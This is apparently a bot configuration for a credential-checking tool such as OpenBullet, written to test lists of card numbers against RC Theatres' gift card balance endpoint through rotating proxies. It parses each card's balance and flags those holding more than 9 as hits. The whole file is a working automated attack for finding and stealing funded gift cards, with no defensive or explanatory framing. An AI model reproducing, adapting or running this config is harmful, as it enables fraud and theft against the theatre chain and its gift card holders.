[SETTINGS]
{
  "Name": "RC THEATRES GC",
  "SuggestedBots": 100,
  "LastModified": "2018-06-20T01:27:44.2431271+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "Cards",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://rctheatresmanagementcorp.alohaenterprise.com:4430/servlet/MemberLinkSVServlet?companyID=rtm01&requestType=checkSVCardForEPin&cardNumber=<USER>&_=1529456359446" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" JSON "cardBalance" Recursive=FALSE -> VAR "BALANCE" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "<BALANCE>" GreaterThan "9" 
  KEYCHAIN Failure OR 
    KEY "<BALANCE>" LessThan "9" 
    KEY "INVALID" 
PARSE "<SOURCE>" JSON "cardBalance" Recursive=FALSE -> CAP "CARD BALANCE" "" "" 
